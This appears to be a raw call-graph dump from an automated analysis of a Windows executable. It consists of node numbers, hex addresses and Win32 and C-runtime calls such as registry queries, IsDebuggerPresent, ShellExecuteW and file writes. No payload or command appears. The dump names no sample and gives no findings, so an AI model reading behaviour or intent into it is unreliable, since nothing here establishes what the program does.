86366 4115d7 52 API calls 86363->86366 86370 402f00 86364->86370 86367 40bdf6 86366->86367 86367->86362 86368 4115d7 52 API calls 86367->86368 86368->86362 86369->86354 86371 402f10 86370->86371 86372 402f0c 86370->86372 86373 4115d7 52 API calls 86371->86373 86374 4268c3 86371->86374 86372->86362 86375 402f51 moneypunct _memmove 86373->86375 86375->86362 86376 425ba2 86381 40e360 86376->86381 86378 425bb4 86397 41130a 51 API calls __cinit 86378->86397 86380 425bbe 86382 4115d7 52 API calls 86381->86382 86383 40e3ec GetModuleFileNameW 86382->86383 86398 413a0e 86383->86398 86385 40e421 _wcsncat 86401 413a9e 86385->86401 86388 4115d7 52 API calls 86389 40e45e _wcscpy 86388->86389 86390 40bc70 52 API calls 86389->86390 86391 40e498 86390->86391 86404 40e4c0 86391->86404 86393 40e4a9 86393->86378 86394 4115d7 52 API calls 86395 40e4a1 _wcscat _wcslen _wcsncpy 86394->86395 86395->86393 86395->86394 86396 401c90 52 API calls 86395->86396 86396->86395 86397->86380 86418 413801 86398->86418 86448 419efd 86401->86448 86460 403350 86404->86460 86406 40e4cb RegOpenKeyExW 86407 427190 RegQueryValueExW 86406->86407 86408 40e4eb 86406->86408 86409 4271b0 86407->86409 86410 42721a RegCloseKey 86407->86410 86408->86395 86411 4115d7 52 API calls 86409->86411 86410->86395 86412 4271cb 86411->86412 86467 43652f 52 API calls 86412->86467 86414 4271d8 RegQueryValueExW 86415 42720e 86414->86415 86416 4271f7 86414->86416 86415->86410 86417 402160 52 API calls 86416->86417 86417->86415 86419 41389e 86418->86419 86420 41381a 86418->86420 86421 4139e8 86419->86421 86423 413a00 86419->86423 86420->86419 86434 41388a 86420->86434 86440 419e30 46 API calls __controlfp_s 86420->86440 86445 417f77 46 API calls __getptd_noexit 86421->86445 86447 417f77 46 API calls __getptd_noexit 86423->86447 86424 4139ed 86446 417f25 10 API calls __controlfp_s 86424->86446 86427 413967 86427->86385 86429 41396c 86429->86419 86429->86427 86432 41397a 86429->86432 86430 413929 86430->86419 86431 413945 86430->86431 86442 419e30 46 API calls __controlfp_s 86430->86442 86431->86419 86431->86427 86436 41395b 86431->86436 86444 419e30 46 API calls __controlfp_s 86432->86444 86434->86419 86439 413909 86434->86439 86441 419e30 46 API calls __controlfp_s 86434->86441 86443 419e30 46 API calls __controlfp_s 86436->86443 86439->86429 86439->86430 86440->86434 86441->86439 86442->86431 86443->86427 86444->86427 86445->86424 86446->86427 86447->86427 86449 419f13 86448->86449 86450 419f0e 86448->86450 86457 417f77 46 API calls __getptd_noexit 86449->86457 86450->86449 86451 419f2b 86450->86451 86455 40e454 86451->86455 86459 417f77 46 API calls __getptd_noexit 86451->86459 86455->86388 86456 419f18 86458 417f25 10 API calls __controlfp_s 86456->86458 86457->86456 86458->86455 86459->86456 86461 403367 86460->86461 86462 403358 86460->86462 86463 4115d7 52 API calls 86461->86463 86462->86406 86464 403370 86463->86464 86465 4115d7 52 API calls 86464->86465 86466 40339e 86465->86466 86466->86406 86467->86414 86468 416454 86505 416c70 86468->86505 86470 416460 GetStartupInfoW 86471 416474 86470->86471 86506 419d5a HeapCreate 86471->86506 86473 4164cd 86474 4164d8 86473->86474 86589 41642b 46 API calls 3 library calls 86473->86589 86507 417c20 GetModuleHandleW 86474->86507 86477 4164de 86478 4164e9 __RTC_Initialize 86477->86478 86590 41642b 46 API calls 3 library calls 86477->86590 86526 41aaa1 GetStartupInfoW 86478->86526 86482 416503 GetCommandLineW 86539 41f584 GetEnvironmentStringsW 86482->86539 86486 416513 86545 41f4d6 GetModuleFileNameW 86486->86545 86488 41651d 86489 416528 86488->86489 86592 411924 46 API calls 3 library calls 86488->86592 86549 41f2a4 86489->86549 86492 41652e 86493 416539 86492->86493 86593 411924 46 API calls 3 library calls 86492->86593 86563 411703 86493->86563 86496 416541 86498 41654c __wwincmdln 86496->86498 86594 411924 46 API calls 3 library calls 86496->86594 86567 40d6b0 86498->86567 86501 41657c 86596 411906 46 API calls _doexit 86501->86596 86504 416581 __getstream 86505->86470 86506->86473 86508 417c34 86507->86508 86509 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86507->86509 86597 4178ff 49 API calls _free 86508->86597 86510 417c87 TlsAlloc 86509->86510 86514 417cd5 TlsSetValue 86510->86514 86515 417d96 86510->86515 86513 417c39 86513->86477 86514->86515 86516 417ce6 __init_pointers 86514->86516 86515->86477 86598 418151 InitializeCriticalSectionAndSpinCount 86516->86598 86518 417d91 86606 4178ff 49 API calls _free 86518->86606 86520 417d2a 86520->86518 86599 416b49 86520->86599 86523 417d76 86605 41793c 46 API calls 4 library calls 86523->86605 86525 417d7e GetCurrentThreadId 86525->86515 86527 416b49 __calloc_crt 46 API calls 86526->86527 86533 41aabf 86527->86533 86528 4164f7 86528->86482 86591 411924 46 API calls 3 library calls 86528->86591 86529 41ac6a GetStdHandle 86531 41ac34 86529->86531 86530 41acce SetHandleCount 86530->86528 86531->86529 86531->86530 86534 41ac7c GetFileType 86531->86534 86537 41aca2 InitializeCriticalSectionAndSpinCount 86531->86537 86532 416b49 __calloc_crt 46 API calls 86532->86533 86533->86528 86533->86531 86533->86532 86538 41abb4 86533->86538 86534->86531 86535 41abe0 GetFileType 86536 41abeb InitializeCriticalSectionAndSpinCount 86535->86536 86535->86538 86536->86528 86536->86538 86537->86528 86537->86531 86538->86531 86538->86535 86538->86536 86540 41f595 86539->86540 86541 41f599 86539->86541 86540->86486 86616 416b04 86541->86616 86543 41f5bb _memmove 86544 41f5c2 FreeEnvironmentStringsW 86543->86544 86544->86486 86546 41f50b _wparse_cmdline 86545->86546 86547 416b04 __malloc_crt 46 API calls 86546->86547 86548 41f54e _wparse_cmdline 86546->86548 86547->86548 86548->86488 86550 41f2bc _wcslen 86549->86550 86552 41f2b4 86549->86552 86551 416b49 __calloc_crt 46 API calls 86550->86551 86556 41f2e0 _wcslen 86551->86556 86552->86492 86553 41f336 86623 413748 86553->86623 86555 416b49 __calloc_crt 46 API calls 86555->86556 86556->86552 86556->86553 86556->86555 86557 41f35c 86556->86557 86560 41f373 86556->86560 86622 41ef12 46 API calls __controlfp_s 86556->86622 86558 413748 _free 46 API calls 86557->86558 86558->86552 86629 417ed3 86560->86629 86562 41f37f 86562->86492 86564 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86563->86564 86566 411750 __IsNonwritableInCurrentImage 86564->86566 86648 41130a 51 API calls __cinit 86564->86648 86566->86496 86568 42e2f3 86567->86568 86569 40d6cc 86567->86569 86570 408f40 VariantClear 86569->86570 86571 40d707 86570->86571 86649 40ebb0 86571->86649 86578 40d737 86652 411951 86578->86652 86579 40d751 86664 40f4e0 SystemParametersInfoW SystemParametersInfoW 86579->86664 86581 40d75f 86665 40d590 GetCurrentDirectoryW 86581->86665 86583 40d767 SystemParametersInfoW 86584 40d78d 86583->86584 86585 408f40 VariantClear 86584->86585 86586 40d79d 86585->86586 86587 408f40 VariantClear 86586->86587 86588 40d7a6 86587->86588 86588->86501 86595 4118da 46 API calls _doexit 86588->86595 86589->86474 86590->86478 86595->86501 86596->86504 86597->86513 86598->86520 86601 416b52 86599->86601 86602 416b8f 86601->86602 86603 416b70 Sleep 86601->86603 86607 41f677 86601->86607 86602->86518 86602->86523 86604 416b85 86603->86604 86604->86601 86604->86602 86605->86525 86606->86515 86608 41f683 86607->86608 86613 41f69e _malloc 86607->86613 86609 41f68f 86608->86609 86608->86613 86615 417f77 46 API calls __getptd_noexit 86609->86615 86610 41f6b1 HeapAlloc 86612 41f6d8 86610->86612 86610->86613 86612->86601 86613->86610 86613->86612 86614 41f694 86614->86601 86615->86614 86618 416b0d 86616->86618 86617 4135bb _malloc 45 API calls 86617->86618 86618->86617 86619 416b43 86618->86619 86620 416b24 Sleep 86618->86620 86619->86543 86621 416b39 86620->86621 86621->86618 86621->86619 86622->86556 86624 413753 RtlFreeHeap 86623->86624 86628 41377c __dosmaperr 86623->86628 86625 413768 86624->86625 86624->86628 86632 417f77 46 API calls __getptd_noexit 86625->86632 86627 41376e GetLastError 86627->86628 86628->86552 86633 417daa 86629->86633 86632->86627 86634 417dc9 __cftof2_l __call_reportfault 86633->86634 86635 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86634->86635 86638 417eb5 __call_reportfault 86635->86638 86637 417ed1 GetCurrentProcess TerminateProcess 86637->86562 86639 41a208 86638->86639 86640 41a210 86639->86640 86641 41a212 IsDebuggerPresent 86639->86641 86640->86637 86647 41fe19 86641->86647 86644 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86645 421ff0 __call_reportfault 86644->86645 86646 421ff8 GetCurrentProcess TerminateProcess 86644->86646 86645->86646 86646->86637 86647->86644 86648->86566 86705 40ebd0 86649->86705 86709 4182cb 86652->86709 86654 41195e 86716 4181f2 LeaveCriticalSection 86654->86716 86656 40d748 86657 4119b0 86656->86657 86658 4119d6 86657->86658 86659 4119bc 86657->86659 86658->86579 86659->86658 86751 417f77 46 API calls __getptd_noexit 86659->86751 86661 4119c6 86752 417f25 10 API calls __controlfp_s 86661->86752 86663 4119d1 86663->86579 86664->86581 86753 401f20 86665->86753 86667 40d5b6 IsDebuggerPresent 86668 40d5c4 86667->86668 86669 42e1bb MessageBoxA 86667->86669 86670 42e1d4 86668->86670 86671 40d5e3 86668->86671 86669->86670 86925 403a50 52 API calls 3 library calls 86670->86925 86823 40f520 86671->86823 86675 40d5fd GetFullPathNameW 86835 401460 86675->86835 86677 40d63b 86678 40d643 86677->86678 86679 42e231 SetCurrentDirectoryW 86677->86679 86680 40d64c 86678->86680 86926 432fee 6 API calls 86678->86926 86679->86678 86850 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86680->86850 86683 42e252 86683->86680 86685 42e25a GetModuleFileNameW 86683->86685 86688 42e274 86685->86688 86689 42e2cb GetForegroundWindow ShellExecuteW 86685->86689 86687 40d656 86690 40d669 86687->86690 86693 40e0c0 74 API calls 86687->86693 86927 401b10 86688->86927 86691 40d688 86689->86691 86858 4091e0 86690->86858 86698 40d692 SetCurrentDirectoryW 86691->86698 86693->86690 86698->86583 86699 42e28d 86934 40d200 52 API calls 2 library calls 86699->86934 86702 42e299 GetForegroundWindow ShellExecuteW 86703 42e2c6 86702->86703 86703->86691 86704 40ec00 LoadLibraryA GetProcAddress 86704->86578 86706 40d72e 86705->86706 86707 40ebd6 LoadLibraryA 86705->86707 86706->86578 86706->86704 86707->86706 86708 40ebe7 GetProcAddress 86707->86708 86708->86706 86710 4182e0 86709->86710 86711 4182f3 EnterCriticalSection 86709->86711 86717 418209 86710->86717 86711->86654 86713 4182e6 86713->86711 86744 411924 46 API calls 3 library calls 86713->86744 86716->86656 86718 418215 __getstream 86717->86718 86719 418225 86718->86719 86720 41823d 86718->86720 86745 418901 46 API calls __NMSG_WRITE 86719->86745 86723 416b04 __malloc_crt 45 API calls 86720->86723 86726 41824b __getstream 86720->86726 86722 41822a 86746 418752 46 API calls 6 library calls 86722->86746 86725 418256 86723->86725 86728 41825d 86725->86728 86729 41826c 86725->86729 86726->86713 86727 418231 86747 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86727->86747 86748 417f77 46 API calls __getptd_noexit 86728->86748 86730 4182cb __lock 45 API calls 86729->86730 86733 418273 86730->86733 86735 4182a6 86733->86735 86736 41827b InitializeCriticalSectionAndSpinCount 86733->86736 86739 413748 _free 45 API calls 86735->86739 86737 418297 86736->86737 86738 41828b 86736->86738 86750 4182c2 LeaveCriticalSection _doexit 86737->86750 86740 413748 _free 45 API calls 86738->86740 86739->86737 86741 418291 86740->86741 86749 417f77 46 API calls __getptd_noexit 86741->86749 86745->86722 86746->86727 86748->86726 86749->86737 86750->86726 86751->86661 86752->86663 86935 40e6e0 86753->86935 86757 401f41 GetModuleFileNameW 86953 410100 86757->86953 86759 401f5c 86965 410960 86759->86965 86762 401b10 52 API calls 86763 401f81 86762->86763 86764 401980 53 API calls 86763->86764 86765 401f8e 86764->86765 86766 408f40 VariantClear 86765->86766 86767 401f9d 86766->86767 86768 401b10 52 API calls 86767->86768 86769 401fb4 86768->86769 86770 401980 53 API calls 86769->86770 86771 401fc3 86770->86771 86772 401b10 52 API calls 86771->86772 86773 401fd2 86772->86773 86968 40c2c0 86773->86968 86775 401fe1 86776 40bc70 52 API calls 86775->86776 86777 401ff3 86776->86777 86986 401a10 86777->86986 86779 401ffe 86993 4114ab 86779->86993 86782 428b05 86784 401a10 52 API calls 86782->86784 86783 402017 86785 4114ab __wcsicoll 58 API calls 86783->86785 86786 428b18 86784->86786 86787 402022 86785->86787 86789 401a10 52 API calls 86786->86789 86787->86786 86788 40202d 86787->86788 86790 4114ab __wcsicoll 58 API calls 86788->86790 86791 428b33 86789->86791 86792 402038 86790->86792 86794 428b3b GetModuleFileNameW 86791->86794 86793 402043 86792->86793 86792->86794 86795 4114ab __wcsicoll 58 API calls 86793->86795 86796 401a10 52 API calls 86794->86796 86797 40204e 86795->86797 86798 428b6c 86796->86798 86799 402092 86797->86799 86803 401a10 52 API calls 86797->86803 86808 428b90 _wcscpy 86797->86808 86800 40e0a0 52 API calls 86798->86800 86802 4020a3 86799->86802 86799->86808 86801 428b7a 86800->86801 86804 401a10 52 API calls 86801->86804 86805 428bc6 86802->86805 86809 40e830 53 API calls 86802->86809 86806 402073 _wcscpy 86803->86806 86807 428b88 86804->86807 86814 401a10 52 API calls 86806->86814 86807->86808 86811 401a10 52 API calls 86808->86811 86810 4020bb 86809->86810 87001 40cf00 86810->87001 86816 4020d0 86811->86816 86813 4020c6 86815 408f40 VariantClear 86813->86815 86814->86799 86815->86816 86817 40cf00 53 API calls 86816->86817 86819 402110 86816->86819 86821 401a10 52 API calls 86816->86821 87014 40e6a0 53 API calls 86816->87014 86817->86816 86820 408f40 VariantClear 86819->86820 86822 402120 moneypunct 86820->86822 86821->86816 86822->86667 86824 4295c9 __cftof2_l 86823->86824 86825 40f53c 86823->86825 86828 4295d9 GetOpenFileNameW 86824->86828 87867 410120 86825->87867 86827 40f545 87871 4102b0 SHGetMalloc 86827->87871 86828->86825 86830 40d5f5 86828->86830 86830->86675 86830->86677 86831 40f54c 87876 410190 GetFullPathNameW 86831->87876 86833 40f559 87887 40f570 86833->87887 87929 402400 86835->87929 86837 40146f 86840 428c29 _wcscat 86837->86840 87938 401500 86837->87938 86839 40147c 86839->86840 87946 40d440 86839->87946 86842 401489 86842->86840 86843 401491 GetFullPathNameW 86842->86843 86844 402160 52 API calls 86843->86844 86845 4014bb 86844->86845 86846 402160 52 API calls 86845->86846 86847 4014c8 86846->86847 86847->86840 86848 402160 52 API calls 86847->86848 86849 4014ee 86848->86849 86849->86677 86851 428361 86850->86851 86852 4103fc LoadImageW RegisterClassExW 86850->86852 88021 44395e EnumResourceNamesW LoadImageW 86851->88021 88020 410490 7 API calls 86852->88020 86855 40d651 86857 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86855->86857 86856 428368 86857->86687 86859 409202 86858->86859 86860 42d7ad 86858->86860 86917 409216 moneypunct 86859->86917 88293 410940 398 API calls 86859->88293 88296 45e737 90 API calls 3 library calls 86860->88296 86863 409386 86864 40939c 86863->86864 88294 40f190 10 API calls 86863->88294 86864->86691 86924 401000 Shell_NotifyIconW __cftof2_l 86864->86924 86866 4095b2 86866->86864 86868 4095bf 86866->86868 86867 409253 PeekMessageW 86867->86917 88295 401a50 398 API calls 86868->88295 86870 40d410 VariantClear 86870->86917 86871 42d8cd Sleep 86871->86917 86872 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86872->86864 86875 4095f9 86872->86875 86874 42e13b 88314 40d410 VariantClear 86874->88314 86878 42e158 TranslateMessage DispatchMessageW GetMessageW 86875->86878 86878->86878 86881 42e188 86878->86881 86880 409567 PeekMessageW 86880->86917 86881->86864 86883 44c29d 52 API calls 86923 4094e0 86883->86923 86884 46f3c1 107 API calls 86884->86917 86885 40e0a0 52 API calls 86885->86917 86886 46fdbf 108 API calls 86886->86923 86887 42dcd2 WaitForSingleObject 86892 42dcf0 GetExitCodeProcess CloseHandle 86887->86892 86887->86917 86888 409551 TranslateMessage DispatchMessageW 86888->86880 86890 42dd3d Sleep 86890->86923 86891 47d33e 376 API calls 86891->86917 88303 40d410 VariantClear 86892->88303 86896 4094cf Sleep 86896->86923 86897 42d94d timeGetTime 88299 465124 53 API calls 86897->88299 86899 408f40 VariantClear 86899->86923 86902 40c620 timeGetTime 86902->86923 86903 465124 53 API calls 86903->86923 86905 42dd89 CloseHandle 86905->86923 86907 42de19 GetExitCodeProcess CloseHandle 86907->86923 86908 401b10 52 API calls 86908->86923 86911 42de88 Sleep 86911->86917 86914 45e737 90 API calls 86914->86917 86917->86863 86917->86867 86917->86870 86917->86871 86917->86874 86917->86880 86917->86884 86917->86885 86917->86887 86917->86888 86917->86890 86917->86891 86917->86896 86917->86897 86917->86914 86918 42e0cc VariantClear 86917->86918 86919 408f40 VariantClear 86917->86919 86917->86923 88022 4091b0 86917->88022 88080 40afa0 86917->88080 88106 408fc0 86917->88106 88141 408cc0 86917->88141 88155 40d150 86917->88155 88160 40d170 86917->88160 88166 4096a0 86917->88166 88297 465124 53 API calls 86917->88297 88298 40c620 timeGetTime 86917->88298 88313 40e270 VariantClear moneypunct 86917->88313 86918->86917 86919->86917 86921 401980 53 API calls 86921->86923 86923->86883 86923->86886 86923->86899 86923->86902 86923->86903 86923->86905 86923->86907 86923->86908 86923->86911 86923->86917 86923->86921 88300 45178a 54 API calls 86923->88300 88301 47d33e 398 API calls 86923->88301 88302 453bc6 54 API calls 86923->88302 88304 40d410 VariantClear 86923->88304 88305 443d19 67 API calls _wcslen 86923->88305 88306 4574b4 VariantClear 86923->88306 88307 403cd0 86923->88307 88311 4731e1 VariantClear 86923->88311 88312 4331a2 6 API calls 86923->88312 86924->86691 86925->86677 86926->86683 86928 401b16 _wcslen 86927->86928 86929 4115d7 52 API calls 86928->86929 86932 401b63 86928->86932 86930 401b4b _memmove 86929->86930 86931 4115d7 52 API calls 86930->86931 86931->86932 86933 40d200 52 API calls 2 library calls 86932->86933 86933->86699 86934->86702 86936 40bc70 52 API calls 86935->86936 86937 401f31 86936->86937 86938 402560 86937->86938 86939 40256d __write_nolock 86938->86939 86940 402160 52 API calls 86939->86940 86942 402593 86940->86942 86945 4025bd 86942->86945 87015 401c90 86942->87015 86943 4026f0 52 API calls 86943->86945 86944 4026a7 86946 401b10 52 API calls 86944->86946 86951 4026db 86944->86951 86945->86943 86945->86944 86947 401b10 52 API calls 86945->86947 86952 401c90 52 API calls 86945->86952 87018 40d7c0 52 API calls 2 library calls 86945->87018 86948 4026d1 86946->86948 86947->86945 87019 40d7c0 52 API calls 2 library calls 86948->87019 86951->86757 86952->86945 87020 40f760 86953->87020 86956 410118 86956->86759 86958 42805d 86961 42806a 86958->86961 87076 431e58 86958->87076 86960 413748 _free 46 API calls 86962 428078 86960->86962 86961->86960 86963 431e58 82 API calls 86962->86963 86964 428084 86963->86964 86964->86759 86966 4115d7 52 API calls 86965->86966 86967 401f74 86966->86967 86967->86762 86969 40c2c7 86968->86969 86970 40c30e 86968->86970 86973 40c2d3 86969->86973 86974 426c79 86969->86974 86971 40c315 86970->86971 86972 426c2b 86970->86972 86975 40c321 86971->86975 86976 426c5a 86971->86976 86978 426c4b 86972->86978 86979 426c2e 86972->86979 87854 403ea0 52 API calls __cinit 86973->87854 87859 4534e3 52 API calls 86974->87859 87855 403ea0 52 API calls __cinit 86975->87855 87858 4534e3 52 API calls 86976->87858 87857 4534e3 52 API calls 86978->87857 86985 40c2de 86979->86985 87856 4534e3 52 API calls 86979->87856 86985->86775 86985->86985 86987 401a30 86986->86987 86988 401a17 86986->86988 86989 402160 52 API calls 86987->86989 86990 401a2d 86988->86990 87860 403c30 52 API calls _memmove 86988->87860 86991 401a3d 86989->86991 86990->86779 86991->86779 86994 411523 86993->86994 86995 4114ba 86993->86995 87863 4113a8 58 API calls 3 library calls 86994->87863 86999 40200c 86995->86999 87861 417f77 46 API calls __getptd_noexit 86995->87861 86998 4114c6 87862 417f25 10 API calls __controlfp_s 86998->87862 86999->86782 86999->86783 87002 428ac6 87001->87002 87003 40cf0e 87001->87003 87002->86813 87004 40cf19 87003->87004 87864 40e810 52 API calls 87003->87864 87007 40cf1d 87004->87007 87866 40e950 53 API calls 87004->87866 87008 40cf38 87007->87008 87009 4115d7 52 API calls 87007->87009 87008->86813 87010 40cf88 87009->87010 87011 40cfaa 87010->87011 87865 40d290 52 API calls 87010->87865 87011->86813 87013 40cf96 87013->86813 87014->86816 87016 4026f0 52 API calls 87015->87016 87017 401c97 87016->87017 87017->86942 87018->86945 87019->86951 87080 40f6f0 87020->87080 87022 40f77b _strcat moneypunct 87088 40f850 87022->87088 87027 427c2a 87117 414d04 87027->87117 87029 40f7fc 87029->87027 87030 40f804 87029->87030 87104 414a46 87030->87104 87034 40f80e 87034->86956 87039 4528bd 87034->87039 87036 427c59 87123 414fe2 87036->87123 87038 427c79 87040 4150d1 _fseek 81 API calls 87039->87040 87041 452930 87040->87041 87756 452719 87041->87756 87044 452948 87044->86958 87045 414d04 __fread_nolock 61 API calls 87046 452966 87045->87046 87047 414d04 __fread_nolock 61 API calls 87046->87047 87048 452976 87047->87048 87049 414d04 __fread_nolock 61 API calls 87048->87049 87050 45298f 87049->87050 87051 414d04 __fread_nolock 61 API calls 87050->87051 87052 4529aa 87051->87052 87053 4150d1 _fseek 81 API calls 87052->87053 87054 4529c4 87053->87054 87055 4135bb _malloc 46 API calls 87054->87055 87056 4529cf 87055->87056 87057 4135bb _malloc 46 API calls 87056->87057 87058 4529db 87057->87058 87059 414d04 __fread_nolock 61 API calls 87058->87059 87060 4529ec 87059->87060 87061 44afef GetSystemTimeAsFileTime 87060->87061 87062 452a00 87061->87062 87063 452a36 87062->87063 87064 452a13 87062->87064 87066 452aa5 87063->87066 87067 452a3c 87063->87067 87065 413748 _free 46 API calls 87064->87065 87069 452a1c 87065->87069 87068 413748 _free 46 API calls 87066->87068 87762 44b1a9 87067->87762 87071 452aa3 87068->87071 87072 413748 _free 46 API calls 87069->87072 87071->86958 87074 452a25 87072->87074 87073 452a9d 87075 413748 _free 46 API calls 87073->87075 87074->86958 87075->87071 87077 431e64 87076->87077 87078 431e6a 87076->87078 87079 414a46 __fcloseall 82 API calls 87077->87079 87078->86961 87079->87078 87081 425de2 87080->87081 87085 40f6fc _wcslen 87080->87085 87081->87022 87082 40f710 WideCharToMultiByte 87083 40f756 87082->87083 87084 40f728 87082->87084 87083->87022 87086 4115d7 52 API calls 87084->87086 87085->87082 87087 40f735 WideCharToMultiByte 87086->87087 87087->87022 87090 40f85d __cftof2_l _strlen 87088->87090 87091 40f7ab 87090->87091 87136 414db8 87090->87136 87092 4149c2 87091->87092 87307 414904 87092->87307 87094 40f7e9 87094->87027 87095 40f5c0 87094->87095 87099 40f5cd _strcat __write_nolock _memmove 87095->87099 87096 414d04 __fread_nolock 61 API calls 87096->87099 87097 40f691 __tzset_nolock 87097->87029 87099->87096 87099->87097 87100 425d11 87099->87100 87395 4150d1 87099->87395 87101 4150d1 _fseek 81 API calls 87100->87101 87102 425d33 87101->87102 87103 414d04 __fread_nolock 61 API calls 87102->87103 87103->87097 87105 414a52 __getstream 87104->87105 87106 414a64 87105->87106 87107 414a79 87105->87107 87515 417f77 46 API calls __getptd_noexit 87106->87515 87110 415471 __lock_file 47 API calls 87107->87110 87112 414a74 __getstream 87107->87112 87109 414a69 87516 417f25 10 API calls __controlfp_s 87109->87516 87113 414a92 87110->87113 87112->87034 87499 4149d9 87113->87499 87584 414c76 87117->87584 87119 414d1c 87120 44afef 87119->87120 87749 442c5a 87120->87749 87122 44b00d 87122->87036 87124 414fee __getstream 87123->87124 87125 414ffa 87124->87125 87126 41500f 87124->87126 87753 417f77 46 API calls __getptd_noexit 87125->87753 87128 415471 __lock_file 47 API calls 87126->87128 87130 415017 87128->87130 87129 414fff 87754 417f25 10 API calls __controlfp_s 87129->87754 87132 414e4e __ftell_nolock 51 API calls 87130->87132 87133 415024 87132->87133 87755 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87133->87755 87135 41500a __getstream 87135->87038 87137 414dd6 87136->87137 87138 414deb 87136->87138 87147 417f77 46 API calls __getptd_noexit 87137->87147 87138->87137 87140 414df2 87138->87140 87149 41b91b 79 API calls 12 library calls 87140->87149 87141 414ddb 87148 417f25 10 API calls __controlfp_s 87141->87148 87144 414e18 87145 414de6 87144->87145 87150 418f98 87144->87150 87145->87090 87147->87141 87148->87145 87149->87144 87171 414139 87150->87171 87152 418fa8 87153 418fb3 87152->87153 87154 418fca 87152->87154 87181 417f77 46 API calls __getptd_noexit 87153->87181 87155 418fce 87154->87155 87158 418fdb __flsbuf 87154->87158 87182 417f77 46 API calls __getptd_noexit 87155->87182 87164 418fb8 87158->87164 87166 419031 87158->87166 87170 41903c 87158->87170 87183 42064c 87158->87183 87159 4190cb 87161 41b7b2 __write 77 API calls 87159->87161 87160 41904b 87162 419062 87160->87162 87167 41907f 87160->87167 87161->87164 87192 41b7b2 87162->87192 87164->87145 87166->87170 87178 420603 87166->87178 87167->87164 87217 420519 51 API calls 6 library calls 87167->87217 87170->87159 87170->87160 87172 414145 87171->87172 87173 41415a 87171->87173 87218 417f77 46 API calls __getptd_noexit 87172->87218 87173->87152 87175 41414a 87219 417f25 10 API calls __controlfp_s 87175->87219 87177 414155 87177->87152 87179 416b04 __malloc_crt 46 API calls 87178->87179 87180 420618 87179->87180 87180->87170 87181->87164 87182->87164 87184 420659 87183->87184 87186 420668 87183->87186 87220 417f77 46 API calls __getptd_noexit 87184->87220 87188 420686 87186->87188 87221 417f77 46 API calls __getptd_noexit 87186->87221 87187 42065e 87187->87166 87188->87166 87190 420679 87222 417f25 10 API calls __controlfp_s 87190->87222 87193 41b7be __getstream 87192->87193 87194 41b7e1 87193->87194 87195 41b7c6 87193->87195 87197 41b7ed 87194->87197 87200 41b827 87194->87200 87299 417f8a 46 API calls __getptd_noexit 87195->87299 87301 417f8a 46 API calls __getptd_noexit 87197->87301 87198 41b7cb 87300 417f77 46 API calls __getptd_noexit 87198->87300 87223 41ae56 87200->87223 87202 41b7f2 87302 417f77 46 API calls __getptd_noexit 87202->87302 87205 41b82d 87208 41b83b 87205->87208 87209 41b84f 87205->87209 87206 41b7fa 87303 417f25 10 API calls __controlfp_s 87206->87303 87233 41b0b5 87208->87233 87304 417f77 46 API calls __getptd_noexit 87209->87304 87210 41b7d3 __getstream 87210->87164 87213 41b847 87306 41b87e LeaveCriticalSection __unlock_fhandle 87213->87306 87214 41b854 87305 417f8a 46 API calls __getptd_noexit 87214->87305 87217->87164 87218->87175 87219->87177 87220->87187 87221->87190 87222->87187 87224 41ae62 __getstream 87223->87224 87225 41aebc 87224->87225 87228 4182cb __lock 46 API calls 87224->87228 87226 41aec1 EnterCriticalSection 87225->87226 87227 41aede __getstream 87225->87227 87226->87227 87227->87205 87229 41ae8e 87228->87229 87230 41ae97 InitializeCriticalSectionAndSpinCount 87229->87230 87231 41aeaa 87229->87231 87230->87231 87232 41aeec ___lock_fhandle LeaveCriticalSection 87231->87232 87232->87225 87234 41b0c4 __write_nolock 87233->87234 87235 41b119 87234->87235 87236 41b0fa 87234->87236 87287 41b0ef 87234->87287 87241 41b175 87235->87241 87242 41b158 87235->87242 87238 417f8a __read_nolock 46 API calls 87236->87238 87237 41a208 __except_handler4 5 API calls 87240 41b7b0 87237->87240 87239 41b0ff 87238->87239 87245 417f77 __controlfp_s 46 API calls 87239->87245 87240->87213 87243 41b18b 87241->87243 87244 41b17c 87241->87244 87246 417f8a __read_nolock 46 API calls 87242->87246 87249 42064c __flsbuf 46 API calls 87243->87249 87247 420494 __lseeki64_nolock 48 API calls 87244->87247 87248 41b106 87245->87248 87250 41b15d 87246->87250 87251 41b188 87247->87251 87252 417f25 __controlfp_s 10 API calls 87248->87252 87253 41b191 87249->87253 87254 417f77 __controlfp_s 46 API calls 87250->87254 87251->87243 87252->87287 87255 41b433 87253->87255 87260 417a69 __getptd 46 API calls 87253->87260 87256 41b165 87254->87256 87258 41b6e3 WriteFile 87255->87258 87259 41b442 87255->87259 87257 417f25 __controlfp_s 10 API calls 87256->87257 87257->87287 87264 41b716 GetLastError 87258->87264 87291 41b415 87258->87291 87261 41b455 87259->87261 87262 41b4fd 87259->87262 87263 41b1ac GetConsoleMode 87260->87263 87266 41b761 87261->87266 87269 41b49f WriteFile 87261->87269 87265 41b50a 87262->87265 87271 41b5d7 87262->87271 87263->87255 87267 41b1d5 87263->87267 87264->87291 87265->87266 87275 41b579 WriteFile 87265->87275 87270 417f77 __controlfp_s 46 API calls 87266->87270 87266->87287 87267->87255 87268 41b1e5 GetConsoleCP 87267->87268 87268->87291 87296 41b208 87268->87296 87269->87264 87277 41b4d3 87269->87277 87276 41b784 87270->87276 87271->87266 87278 41b648 WideCharToMultiByte 87271->87278 87272 41b734 87273 41b753 87272->87273 87274 41b73f 87272->87274 87281 417f9d __dosmaperr 46 API calls 87273->87281 87279 417f77 __controlfp_s 46 API calls 87274->87279 87275->87264 87282 41b5ad 87275->87282 87283 417f8a __read_nolock 46 API calls 87276->87283 87277->87261 87284 41b4f8 87277->87284 87277->87291 87278->87264 87280 41b67f WriteFile 87278->87280 87285 41b744 87279->87285 87286 41b6b6 GetLastError 87280->87286 87290 41b6aa 87280->87290 87281->87287 87282->87265 87282->87284 87282->87291 87283->87287 87284->87291 87289 417f8a __read_nolock 46 API calls 87285->87289 87286->87290 87287->87237 87288 4131e9 __write_nolock 56 API calls 87288->87296 87289->87287 87290->87271 87290->87280 87290->87284 87290->87291 